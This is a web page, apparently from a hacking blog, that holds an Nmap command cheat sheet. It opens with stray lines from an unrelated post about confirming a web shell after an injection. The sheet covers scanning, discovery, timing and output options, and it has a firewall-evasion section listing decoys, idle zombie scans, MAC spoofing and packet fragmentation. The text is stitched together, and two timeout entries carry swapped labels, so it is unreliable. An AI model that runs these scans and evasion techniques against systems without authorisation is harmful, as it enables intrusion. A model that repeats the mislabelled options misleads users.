OUR SHELL IS THERE INJECTION IS SUCCESSFULLY....
IF SHELL IS NOT THERE THAN TRY ANOTHER WEBSITE...


Thank you (zer0w0rm)
 

Nmap Cheat Sheet

Basic Scanning Techniques

Scan a Single Target
nmap [target]

Scan Multiple Targets
nmap [target1, target2, etc]

Scan a List of Targets
nmap -iL [list.txt]

Scan a Range of Hosts
nmap [range of ip addresses]

Scan an Entire Subnet
nmap [ip address/cdir]

Scan Random Hosts
nmap -iR [number]

Excluding Targets from a Scan
nmap [targets] --exclude [targets]

Excluding Targets Using a List
nmap [targets] --excludefile [list.txt]

Perform an Aggressive Scan
nmap -A [target]

Scan an IPv6 Target
nmap -6 [target]

Click past the jump too see the complete list...

Discovery Options

Perform a Ping Only Scan
nmap -sP [target]

Don’t Ping
nmap -PN [target]

TCP SYN Ping
nmap -PS [target]

TCP ACK Ping
nmap -PA [target]

UDP Ping
nmap -PU [target]

SCTP INIT Ping
nmap -PY [target]

ICMP Echo Ping
nmap -PE [target]

ICMP Timestamp Ping
nmap -PP [target]

ICMP Address Mask Ping
nmap -PM [target]

IP Protocol Ping
nmap -PO [target]

ARP Ping
nmap -PR [target]

Traceroute
nmap --traceroute [target]

Force Reverse DNS Resolution
nmap -R [target]

Disable Reverse DNS Resolution
nmap -n [target]

Alternative DNS Lookup 
nmap --system-dns [target]

Manually Specify DNS Server(s)
nmap --dns-servers [servers] [target]

Create a Host List
nmap -sL [targets]

Advanced Scanning Functions

TCP SYN Scan
nmap -sS [target]

TCP Connect Scan
nmap -sT [target]

UDP Scan
nmap -sU [target]

TCP NULL Scan
nmap -sN [target]

TCP FIN Scan
nmap -sF [target]

Xmas Scan
nmap -sX [target]

TCP ACK Scan
nmap -sA [target]

Custom TCP Scan
nmap --scanflags [flags] [target]

IP Protocol Scan
nmap -sO [target]

Send Raw Ethernet Packets
nmap --send-eth [target]

Send IP Packets
nmap --send-ip [target]

Port Scanning Options


Perform a Fast Scan
nmap -F [target]

Scan Specific Ports
nmap -p [port(s)] [target]

Scan Ports by Name
nmap -p [port name(s)] [target]

Scan Ports by Protocol
nmap -sU -sT -p U:[ports],T:[ports] [target]

Scan All Ports
nmap -p "*" [target]

Scan Top Ports
nmap --top-ports [number] [target]

Perform a Sequential Port Scan
nmap -r [target]

Version Detection

Operating System Detection
nmap -O [target]

Submit  TCP/IP Fingerprints
www.nmap.org/submit/

Attempt to Guess an Unknown OS
nmap -O --osscan-guess [target]

Service Version Detection
nmap -sV  [target]

Troubleshooting Version Scans
nmap -sV --version-trace [target]

Perform a RPC Scan
nmap -sR [target]

Timing Options

Timing Templates
nmap -T[0-5] [target]

Set the Packet TTL
nmap --ttl [time] [target]

Minimum # of Parallel Operations
nmap --min-parallelism [number] [target]

Maximum #  of Parallel Operations
nmap --max-parallelism [number] [target]

Minimum Host Group Size
nmap --min-hostgroup [number] [targets]

Maximum Host Group Size
nmap --max-hostgroup [number] [targets]

Maximum RTT Timeout
nmap --initial-rtt-timeout [time] [target]

Initial RTT Timeout
nmap --max-rtt-timeout [TTL] [target]

Maximum Retries
nmap --max-retries [number] [target]

Host Timeout
nmap --host-timeout [time] [target]

Minimum Scan Delay
nmap --scan-delay [time] [target]

Maximum Scan Delay
nmap --max-scan-delay [time] [target]

Minimum Packet Rate
nmap --min-rate [number] [target]

Maximum Packet Rate
nmap --max-rate [number] [target]

Defeat Reset Rate Limits
nmap --defeat-rst-ratelimit [target]

Firewall Evasion Techniques

Fragment Packets
nmap -f [target]

Specify a Specific MTU
nmap --mtu [MTU] [target]

Use a Decoy
nmap -D RND:[number] [target]

Idle Zombie Scan
nmap -sI [zombie] [target]

Manually Specify a Source Port 
nmap --source-port [port] [target]

Append Random Data
nmap --data-length [size] [target]

Randomize Target Scan Order
nmap --randomize-hosts [target]

Spoof MAC Address
nmap --spoof-mac [MAC|0|vendor] [target]

Send Bad Checksums
nmap --badsum [target]

Output Options

Save Output to a Text File
nmap -oN [scan.txt] [target]

Save Output to a XML File
nmap -oX [scan.xml] [target]

Grepable Output
nmap -oG [scan.txt] [targets]

Output All Supported File Types
nmap -oA [path/filename] [target]

Periodically Display Statistics
nmap --stats-every [time] [target]

133t Output
nmap -oS [scan.txt] [target]


Troubleshooting and Debugging

Getting Help
nmap -h

Display Nmap Version
nmap -V

Verbose Output
nmap -v [target]

Debugging
nmap -d [target]

Display Port State Reason
nmap --reason [target]

Only Display Open Ports
nmap --open [target]

Trace Packets
nmap --packet-trace [target]

Display Host Networking 
nmap --iflist

Specify a Network  Interface
nmap -e [interface] [target]

Nmap Scripting Engine

Execute Individual Scripts
nmap --script [script.nse] [target]

Execute Multiple Scripts
nmap --script [expression] [target]

Script Categories
all, auth, default, discovery, external, intrusive, malware, safe, vuln

Execute Scripts by Category
nmap --script [category] [target]

Execute Multiple Script Categories
nmap --script [category1,category2,etc]

Troubleshoot Scripts
nmap --script [script] --script-trace [target]

Update the Script Database
nmap --script-updatedb

Ndiff

Comparison Using Ndiff
ndiff [scan1.xml] [scan2.xml]

Ndiff Verbose Mode
ndiff -v [scan1.xml] [scan2.xml]

XML Output Mode
ndiff --xml [scan1.xml] [scan2.xml]


Thank you (zer0w0rm)